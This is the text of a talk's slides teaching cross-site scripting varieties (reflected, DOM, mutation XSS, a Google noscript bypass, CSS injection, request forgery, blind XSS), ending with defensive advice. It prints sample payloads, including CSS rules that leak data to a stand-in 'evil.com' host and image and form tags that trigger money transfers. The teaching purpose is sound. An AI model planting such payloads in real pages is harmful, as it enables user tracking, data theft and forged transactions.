XXSS

EXOTIC CROSS-SITE SCRIPTING VECTORS

@BenedekGagyi

so.....
what's up with
Security?

@BenedekGagyi

@BenedekGagyi

just enjoy the show and try to learn from it ...

Hat

@BenedekGagyi

@BenedekGagyi

You Don't have to be an expert to be able to enjoy something

@samykamkar

"but most of all, Samy is my hero"

ATTACK FLOW

Malicious script

Site containing malicious script

@BenedekGagyi

Types of XSS

Stored

NON-DOM Based

?

?

?

@BenedekGagyi

Reflected XSS

https://www.mybank.com?name=<script>alert(1)</script>

@BenedekGagyi

ATTACK FLOW

URL containing malicious script

Site containing malicious script

Request made using malicious URL

@BenedekGagyi

Types of XSS

Stored

NON-DOM Based

?

?

reflected

@BenedekGagyi

Types of XSS

Stored

NON-DOM-Based

reflected

DOM-Based

(Server rendered)

(browser rendered)

@BenedekGagyi

User inputs

Where should we sanitise input?

@BenedekGagyi

browsers are ... weird

<div><script title="</div>">
<div>
  <script title="</div>">
  </script>
</div>

@BenedekGagyi

browsers are ... weird

<script><div title="</script>"
<script>
  <div title="
</script>
"

@BenedekGagyi

mutation XSS

defending against mXSS

const div = document.createElement("div");

parse string

Interpret it

div.innerHTML =
"<img src=x onerror=alert(1)";

@BenedekGagyi

"[..] is a mechanism for holding HTML that is not to be rendered immediately when a page is loaded but may be instantiated subsequently"

@BenedekGagyi

defending against mXSS

var template = document.createElement("template");
template.innerHTML = 
"<img src=x onerror=alert(1)";
template.content.children[0]
.removeAttribute('onError')

@BenedekGagyi

Google search vulnerability

<noscript>
  <p title="
    </noscript>
    <img src=x onerror=alert(1)>
  ">

@BenedekGagyi

Google search vulnerability

<noscript>
  <p title="
    </noscript>
    <img src=x onerror=alert(1)>
  ">
  </p>
</noscript>

@BenedekGagyi

Google search vulnerability

<noscript>
  <p title="
</noscript>
<img src=x onerror=alert(1)>
"">"
<p></p>

@BenedekGagyi

@BenedekGagyi

What if I can't inject a script or javascript is turned off completely?

CSS injection

background-image: 
url(www.evil-site.com/track)
  • PII - Personally Identifiable Information
    • IP Address
    • OS
    • Browser

@BenedekGagyi

CSS injection

  • User behaviour tracking
.two-factor-checkbox:checked {
  background-image: 
    url(www.evil.com/track?no2fa=true);
}

.security-tips-link:visited {
  background-image: 
    url(www.evil.com/track?uneducated=true);
}

@BenedekGagyi

CSS injection

  • Data scraping
  • Key logging
.meeting-location[value="Iulius Mall"]{
  background-image: 
    url(www.evil.com/track?loc=IuliusMall);
}

@BenedekGagyi

on-site request forgery
(OSRF)

Page

<html>
</html>

Malicious link

<a href="...
<a 
  href="
    /sendMoney?
    amount=100&
    to=123
  "
>
</a>

@BenedekGagyi

Html injection

<form 
  action="
    /sendMoney?
    amount=100&
    to=123
  "
>
  <button>Click me for free pizza</button>
</form>

@BenedekGagyi

Html injection

Beware of
images

Image Injetion

@BenedekGagyi

<img 
  src="invalid.address"
  onerror="alert(':P')" 
/>

OSRF

this time with an image!

<img src="https://bank.com/
    send_money?
    amount=9999&
    to=1231234143" 
/>

@BenedekGagyi

But I have CSP set!

<img 
  src="https://www.facebook.com/
    tr?
    id=1234567890&
    ev=PageView"
/>

@BenedekGagyi

What do you consider user input?

@BenedekGagyi

blind XSS

<script>alert(":P")</script>
True-Client-IP: 

@BenedekGagyi

User-Agent:
<script>alert(":P")</script>

blind XSS

Non-user facing
!==
non-attackable

@BenedekGagyi

TL;DR.

@BenedekGagyi

  • Validate & sanitise input

  • beware of images

  • don't try to be smart

  • Use the framework

  • update third-party components regularly

*

@BenedekGagyi

Stay safe

And don't forget to have fun

Thank

you!